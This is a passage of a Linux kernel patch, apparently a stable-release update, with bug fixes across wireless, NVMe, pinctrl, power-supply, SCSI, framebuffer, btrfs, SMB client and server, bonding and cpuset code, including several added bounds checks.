++	set_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	ret = iwl_trans_wait_tx_queues_empty(mvm->trans, BIT(queue));
+ 	if (ret) {
+@@ -735,7 +741,7 @@ static int iwl_mvm_redirect_queue(struct iwl_mvm *mvm, int queue, int tid,
+ 
+ out:
+ 	/* Continue using the queue */
+-	txq->stopped = false;
++	clear_bit(IWL_MVM_TXQ_STATE_STOP_REDIRECT, &txq->state);
+ 
+ 	return ret;
+ }
+@@ -1443,12 +1449,22 @@ void iwl_mvm_add_new_dqa_stream_wk(struct work_struct *wk)
+ 		 * a queue in the function itself.
+ 		 */
+ 		if (iwl_mvm_sta_alloc_queue(mvm, txq->sta, txq->ac, tid)) {
++			spin_lock_bh(&mvm->add_stream_lock);
+ 			list_del_init(&mvmtxq->list);
++			spin_unlock_bh(&mvm->add_stream_lock);
+ 			continue;
+ 		}
+ 
+-		list_del_init(&mvmtxq->list);
++		/* now we're ready, any remaining races/concurrency will be
++		 * handled in iwl_mvm_mac_itxq_xmit()
++		 */
++		set_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++
+ 		local_bh_disable();
++		spin_lock(&mvm->add_stream_lock);
++		list_del_init(&mvmtxq->list);
++		spin_unlock(&mvm->add_stream_lock);
++
+ 		iwl_mvm_mac_itxq_xmit(mvm->hw, txq);
+ 		local_bh_enable();
+ 	}
+@@ -1862,8 +1878,11 @@ static void iwl_mvm_disable_sta_queues(struct iwl_mvm *mvm,
+ 		struct iwl_mvm_txq *mvmtxq =
+ 			iwl_mvm_txq_from_mac80211(sta->txq[i]);
+ 
++		spin_lock_bh(&mvm->add_stream_lock);
+ 		mvmtxq->txq_id = IWL_MVM_INVALID_QUEUE;
+ 		list_del_init(&mvmtxq->list);
++		clear_bit(IWL_MVM_TXQ_STATE_READY, &mvmtxq->state);
++		spin_unlock_bh(&mvm->add_stream_lock);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/pcie.c b/drivers/net/wireless/marvell/mwifiex/pcie.c
+index 5dcf61761a165..9a698a16a8f38 100644
+--- a/drivers/net/wireless/marvell/mwifiex/pcie.c
++++ b/drivers/net/wireless/marvell/mwifiex/pcie.c
+@@ -172,7 +172,7 @@ static const struct mwifiex_pcie_device mwifiex_pcie8997 = {
+ 	.can_ext_scan = true,
+ };
+ 
+-static const struct of_device_id mwifiex_pcie_of_match_table[] = {
++static const struct of_device_id mwifiex_pcie_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "pci11ab,2b42" },
+ 	{ .compatible = "pci1b4b,2b42" },
+ 	{ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index 9f506efa53705..ea1c1c2412e72 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -479,7 +479,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ 	{"EXTLAST", NULL, 0, 0xFE},
+ };
+ 
+-static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_pcie.c b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+index 5bf5a93937c9c..04517bd3325a2 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_pcie.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_pcie.c
+@@ -295,7 +295,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ 	ret = dma_set_mask(ipc_pcie->dev, DMA_BIT_MASK(64));
+ 	if (ret) {
+ 		dev_err(ipc_pcie->dev, "Could not set PCI DMA mask: %d", ret);
+-		return ret;
++		goto set_mask_fail;
+ 	}
+ 
+ 	ipc_pcie_config_aspm(ipc_pcie);
+@@ -323,6 +323,7 @@ static int ipc_pcie_probe(struct pci_dev *pci,
+ imem_init_fail:
+ 	ipc_pcie_resources_release(ipc_pcie);
+ resources_req_fail:
++set_mask_fail:
+ 	pci_disable_device(pci);
+ pci_enable_fail:
+ 	kfree(ipc_pcie);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index cb71ce3413c2d..c54c6ffba0bcd 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3074,7 +3074,8 @@ static int nvme_init_non_mdts_limits(struct nvme_ctrl *ctrl)
+ 	else
+ 		ctrl->max_zeroes_sectors = 0;
+ 
+-	if (nvme_ctrl_limited_cns(ctrl))
++	if (ctrl->subsys->subtype != NVME_NQN_NVME ||
++	    nvme_ctrl_limited_cns(ctrl))
+ 		return 0;
+ 
+ 	id = kzalloc(sizeof(*id), GFP_KERNEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 60452f6a9f711..581bf94416e6d 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3550,6 +3550,9 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x1d97), /* Lexar NM620 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1d97, 0x2269), /* Lexar NM760 */
++		.driver_data = NVME_QUIRK_BOGUS_NID |
++				NVME_QUIRK_IGNORE_DEV_SUBNQN, },
++	{ PCI_DEVICE(0x10ec, 0x5763), /* TEAMGROUP T-FORCE CARDEA ZERO Z330 SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMAZON, 0x0061),
+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 5e7b82a2b13d0..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,34 +865,32 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+ {
+-	const struct pin_desc *pd;
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
++	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	pd = pin_desc_get(gpio_dev->pctrl, pin);
+-	if (!pd)
+-		return;
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-	pin_reg = readl(gpio_dev->base + pin * 4);
+-	pin_reg &= ~mask;
+-	writel(pin_reg, gpio_dev->base + pin * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-}
++		if (!pd)
++			continue;
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	int i;
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 
+-	for (i = 0; i < desc->npins; i++)
+-		amd_gpio_irq_init_pin(gpio_dev, i);
++		pin_reg = readl(gpio_dev->base + i * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + i * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -945,10 +943,8 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin)) {
+-			amd_gpio_irq_init_pin(gpio_dev, pin);
++		if (!amd_gpio_should_save(gpio_dev, pin))
+ 			continue;
+-		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 8e6f8a6550790..05f4131784629 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -724,6 +724,8 @@ static int axp288_fuel_gauge_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < AXP288_FG_INTR_NUM; i++) {
+ 		pirq = platform_get_irq(pdev, i);
++		if (pirq < 0)
++			continue;
+ 		ret = regmap_irq_get_virq(axp20x->regmap_irqc, pirq);
+ 		if (ret < 0)
+ 			return dev_err_probe(dev, ret, "getting vIRQ %d\n", pirq);
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index cadb6a0c2cc7e..b6c96376776a9 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -276,7 +276,7 @@ static int cros_usbpd_charger_get_power_info(struct port_data *port)
+ 		port->psy_current_max = 0;
+ 		break;
+ 	default:
+-		dev_err(dev, "Port %d: default case!\n", port->port_number);
++		dev_dbg(dev, "Port %d: default case!\n", port->port_number);
+ 		port->psy_usb_type = POWER_SUPPLY_USB_TYPE_SDP;
+ 	}
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 4f9c1c4179165..36f807b5ec442 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -785,8 +785,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
+-		if (tmp < 0)
+-			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+@@ -825,8 +823,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 			 bulk_reg, 4);
+ 	tmp = get_unaligned_be32(bulk_reg);
+-	if (tmp < 0)
+-		tmp = 0;
+ 	boot_charge_mah = ADC_TO_CHARGE_UAH(tmp, charger->res_div) / 1000;
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_OCV_VOL_H,
+ 			 bulk_reg, 2);
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 1707d6d144d21..6a1428d453f3e 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -503,9 +503,6 @@ static int ses_enclosure_find_by_addr(struct enclosure_device *edev,
+ 	int i;
+ 	struct ses_component *scomp;
+ 
+-	if (!edev->component[0].scratch)
+-		return 0;
+-
+ 	for (i = 0; i < edev->components; i++) {
+ 		scomp = edev->component[i].scratch;
+ 		if (scomp->addr != efd->addr)
+@@ -596,8 +593,10 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 						components++,
+ 						type_ptr[0],
+ 						name);
+-				else
++				else if (components < edev->components)
+ 					ecomp = &edev->component[components++];
++				else
++					ecomp = ERR_PTR(-EINVAL);
+ 
+ 				if (!IS_ERR(ecomp)) {
+ 					if (addl_desc_ptr) {
+@@ -728,11 +727,6 @@ static int ses_intf_add(struct device *cdev,
+ 			components += type_ptr[1];
+ 	}
+ 
+-	if (components == 0) {
+-		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
+-		goto err_free;
+-	}
+-
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -774,9 +768,11 @@ static int ses_intf_add(struct device *cdev,
+ 		buf = NULL;
+ 	}
+ page2_not_supported:
+-	scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
+-	if (!scomp)
+-		goto err_free;
++	if (components > 0) {
++		scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
++		if (!scomp)
++			goto err_free;
++	}
+ 
+ 	edev = enclosure_register(cdev->parent, dev_name(&sdev->sdev_gendev),
+ 				  components, &ses_enclosure_callbacks);
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 2bc8baa90c0f2..fa205be94a4b8 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -823,7 +823,7 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	int oldidx = con2fb_map[unit];
+ 	struct fb_info *info = fbcon_registered_fb[newidx];
+ 	struct fb_info *oldinfo = NULL;
+-	int found, err = 0, show_logo;
++	int err = 0, show_logo;
+ 
+ 	WARN_CONSOLE_UNLOCKED();
+ 
+@@ -841,26 +841,26 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	if (oldidx != -1)
+ 		oldinfo = fbcon_registered_fb[oldidx];
+ 
+-	found = search_fb_in_map(newidx);
+-
+-	if (!err && !found) {
++	if (!search_fb_in_map(newidx)) {
+ 		err = con2fb_acquire_newinfo(vc, info, unit);
+-		if (!err)
+-			con2fb_map[unit] = newidx;
++		if (err)
++			return err;
++
++		fbcon_add_cursor_work(info);
+ 	}
+ 
++	con2fb_map[unit] = newidx;
++
+ 	/*
+ 	 * If old fb is not mapped to any of the consoles,
+ 	 * fbcon should release it.
+ 	 */
+-	if (!err && oldinfo && !search_fb_in_map(oldidx))
++	if (oldinfo && !search_fb_in_map(oldidx))
+ 		con2fb_release_oldinfo(vc, oldinfo, info);
+ 
+ 	show_logo = (fg_console == 0 && !user &&
+ 			 logo_shown != FBCON_LOGO_DONTSHOW);
+ 
+-	if (!found)
+-		fbcon_add_cursor_work(info);
+ 	con2fb_map_boot[unit] = newidx;
+ 	con2fb_init_display(vc, info, unit, show_logo);
+ 
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index 14ef3aab76630..221f3cfd13e20 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1116,6 +1116,8 @@ static long do_fb_ioctl(struct fb_info *info, unsigned int cmd,
+ 	case FBIOPUT_VSCREENINFO:
+ 		if (copy_from_user(&var, argp, sizeof(var)))
+ 			return -EFAULT;
++		/* only for kernel-internal use */
++		var.activate &= ~FB_ACTIVATE_KD_TEXT;
+ 		console_lock();
+ 		lock_fb_info(info);
+ 		ret = fbcon_modechange_possible(info, &var);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 883a3671a9774..5b1b5e1a63c8f 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2347,6 +2347,20 @@ static int btrfs_init_csum_hash(struct btrfs_fs_info *fs_info, u16 csum_type)
+ 
+ 	fs_info->csum_shash = csum_shash;
+ 
++	/*
++	 * Check if the checksum implementation is a fast accelerated one.
++	 * As-is this is a bit of a hack and should be replaced once the csum
++	 * implementations provide that information themselves.
++	 */
++	switch (csum_type) {
++	case BTRFS_CSUM_TYPE_CRC32:
++		if (!strstr(crypto_shash_driver_name(csum_shash), "generic"))
++			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
++		break;
++	default:
++		break;
++	}
++
+ 	btrfs_info(fs_info, "using %s (%s) checksum algorithm",
+ 			btrfs_super_csum_name(csum_type),
+ 			crypto_shash_driver_name(csum_shash));
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index abfd7c897075a..e43b16199e22b 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1824,8 +1824,6 @@ static struct dentry *btrfs_mount_root(struct file_system_type *fs_type,
+ 		shrinker_debugfs_rename(&s->s_shrink, "sb-%s:%s", fs_type->name,
+ 					s->s_id);
+ 		btrfs_sb(s)->bdev_holder = fs_type;
+-		if (!strstr(crc32c_impl(), "generic"))
+-			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
+ 		error = btrfs_fill_super(s, fs_devices, data);
+ 	}
+ 	if (!error)
+@@ -1939,6 +1937,8 @@ static void btrfs_resize_thread_pool(struct btrfs_fs_info *fs_info,
+ 	btrfs_workqueue_set_max(fs_info->hipri_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delalloc_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->caching_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_meta_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_write_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_freespace_worker, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delayed_workers, new_pool_size);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index b37379b62cc77..ab59faf8a06a7 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -588,11 +588,15 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 
+ }
+ 
++/* If invalid preauth context warn but use what we requested, SHA-512 */
+ static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* If invalid preauth context warn but use what we requested, SHA-512 */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
+ 	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad preauth context\n");
+ 		return;
+@@ -611,7 +615,11 @@ static void decode_compress_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* sizeof compress context is a one element compression capbility struct */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
+ 	if (len < 10) {
+ 		pr_warn_once("server sent bad compression cntxt\n");
+ 		return;
+@@ -633,6 +641,11 @@ static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+ 	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
+ 	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad crypto ctxt len\n");
+ 		return -EINVAL;
+@@ -679,6 +692,11 @@ static void decode_signing_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(pctxt->DataLength);
+ 
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
+ 	if ((len < 4) || (len > 16)) {
+ 		pr_warn_once("server sent bad signing negcontext\n");
+ 		return;
+@@ -720,14 +738,19 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 	for (i = 0; i < ctxt_cnt; i++) {
+ 		int clen;
+ 		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
+-
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = le16_to_cpu(pctx->DataLength);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
+ 		if (clen > len_of_ctxts)
+ 			break;
+ 
+@@ -748,12 +771,10 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 		else
+ 			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+ 				le16_to_cpu(pctx->ContextType));
+-
+ 		if (rc)
+ 			break;
+-		/* offsets must be 8 byte aligned */
+-		clen = ALIGN(clen, 8);
+-		offset += clen + sizeof(struct smb2_neg_context);
++
++		offset += clen;
+ 		len_of_ctxts -= clen;
+ 	}
+ 	return rc;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 4effe8df5ae92..5de7b41d64044 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -872,17 +872,21 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt)
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int len_of_ctxts)
+ {
+-	__le32 err = STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
++	 * which may not be present. Only check for used HashAlgorithms[1].
++	 */
++	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
+ 
+-	if (pneg_ctxt->HashAlgorithms == SMB2_PREAUTH_INTEGRITY_SHA512) {
+-		conn->preauth_info->Preauth_HashId =
+-			SMB2_PREAUTH_INTEGRITY_SHA512;
+-		err = STATUS_SUCCESS;
+-	}
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+ 
+-	return err;
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
+ }
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+@@ -1010,7 +1014,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				break;
+ 
+ 			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx);
++						     (struct smb2_preauth_neg_context *)pctx,
++						     len_of_ctxts);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+diff --git a/include/linux/trace.h b/include/linux/trace.h
+index 80ffda8717491..2a70a447184c9 100644
+--- a/include/linux/trace.h
++++ b/include/linux/trace.h
+@@ -33,6 +33,18 @@ struct trace_array;
+ int register_ftrace_export(struct trace_export *export);
+ int unregister_ftrace_export(struct trace_export *export);
+ 
++/**
++ * trace_array_puts - write a constant string into the trace buffer.
++ * @tr:    The trace array to write to
++ * @str:   The constant string to write
++ */
++#define trace_array_puts(tr, str)					\
++	({								\
++		str ? __trace_array_puts(tr, _THIS_IP_, str, strlen(str)) : -1;	\
++	})
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size);
++
+ void trace_printk_init_buffers(void);
+ __printf(3, 4)
+ int trace_array_printk(struct trace_array *tr, unsigned long ip,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 7f585e5dd71b8..061fec6fd0152 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -953,6 +953,7 @@ enum {
+ 	HCI_CONN_STK_ENCRYPT,
+ 	HCI_CONN_AUTH_INITIATOR,
+ 	HCI_CONN_DROP,
++	HCI_CONN_CANCEL,
+ 	HCI_CONN_PARAM_REMOVAL_PEND,
+ 	HCI_CONN_NEW_LINK_KEY,
+ 	HCI_CONN_SCANNING,
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index e999f851738bd..768348008d0c9 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -765,13 +765,17 @@ static inline int bond_get_targets_ip(__be32 *targets, __be32 ip)
+ #if IS_ENABLED(CONFIG_IPV6)
+ static inline int bond_get_targets_ip6(struct in6_addr *targets, struct in6_addr *ip)
+ {
++	struct in6_addr mcaddr;
+ 	int i;
+ 
+-	for (i = 0; i < BOND_MAX_NS_TARGETS; i++)
+-		if (ipv6_addr_equal(&targets[i], ip))
++	for (i = 0; i < BOND_MAX_NS_TARGETS; i++) {
++		addrconf_addr_solict_mult(&targets[i], &mcaddr);
++		if ((ipv6_addr_equal(&targets[i], ip)) ||
++		    (ipv6_addr_equal(&mcaddr, ip)))
+ 			return i;
+ 		else if (ipv6_addr_any(&targets[i]))
+ 			break;
++	}
+ 
+ 	return -1;
+ }
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index fac4260366208..e276db7228451 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -550,11 +550,15 @@ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ /*
+  * update task's spread flag if cpuset's page/slab spread flag is set
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_rwsem held. The check can be skipped
++ * if on default hierarchy.
+  */
+-static void cpuset_update_task_spread_flag(struct cpuset *cs,
++static void cpuset_update_task_spread_flags(struct cpuset *cs,
+ 					struct task_struct *tsk)
+ {
++	if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys))
++		return;
++
+ 	if (is_spread_page(cs))
+ 		task_set_spread_page(tsk);
+ 	else
+@@ -1509,7 +1513,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent, tmp->new_cpus);
++		update_tasks_cpumask(parent, tmp->addmask);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1766,10 +1770,13 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	/*
+ 	 * Use the cpumasks in trialcs for tmpmasks when they are pointers
+ 	 * to allocated cpumasks.
++	 *
++	 * Note that update_parent_subparts_cpumask() uses only addmask &
++	 * delmask, but not new_cpus.
+ 	 */
+ 	tmp.addmask  = trialcs->subparts_cpus;
+ 	tmp.delmask  = trialcs->effective_cpus;
+-	tmp.new_cpus = trialcs->cpus_allowed;
++	tmp.new_cpus = NULL;
+ #endif
+ 
+ 	retval = validate_change(cs, trialcs);
+@@ -1834,6 +1841,11 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	}
+ 	spin_unlock_irq(&callback_lock);
+ 
++#ifdef CONFIG_CPUMASK_OFFSTACK
++	/* Now trialcs->cpus_allowed is available */
++	tmp.new_cpus = trialcs->cpus_allowed;
++#endif
++
+ 	/* effective_cpus will be updated here */
+ 	update_cpumasks_hier(cs, &tmp, false);
+ 
+@@ -2157,7 +2169,7 @@ static void update_tasks_flags(struct cpuset *cs)
+ 
+ 	css_task_iter_start(&cs->css, 0, &it);
+ 	while ((task = css_task_iter_next(&it)))
+-		cpuset_update_task_spread_flag(cs, task);
++		cpuset_update_task_spread_flags(cs, task);
+ 	css_task_iter_end(&it);
+ }
+ 
+@@ -2441,6 +2453,20 @@ static int fmeter_getrate(struct fmeter *fmp)
+ 
+ static struct cpuset *cpuset_attach_old_cs;
+ 
++/*
++ * Check to see if a cpuset can accept a new task
++ * For v1, cpus_allowed and mems_allowed can't be empty.
++ * For v2, effective_cpus can't be empty.
++ * Note that in v1, effective_cpus = cpus_allowed.
++ */
++static int cpuset_can_attach_check(struct cpuset *cs)
++{
++	if (cpumask_empty(cs->effective_cpus) ||
++	   (!is_in_v2_mode() && nodes_empty(cs->mems_allowed)))
++		return -ENOSPC;
++	return 0;
++}
++
+ /* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+@@ -2455,16 +2481,9 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+ 
+-	/* allow moving tasks into an empty cpuset if on default hierarchy */
+-	ret = -ENOSPC;
+-	if (!is_in_v2_mode() &&
+-	    (cpumask_empty(cs->cpus_allowed) || nodes_empty(cs->mems_allowed)))
+-		goto out_unlock;
+-
+-	/*
+-	 * Task cannot be moved to a cpuset with empty effective cpus.
+-	 */
+-	if (cpumask_empty(cs->effective_cpus))
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+@@ -2481,7 +2500,6 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+-	ret = 0;
+ out_unlock:
+ 	percpu_up_write(&cpuset_rwsem);
+ 	return ret;
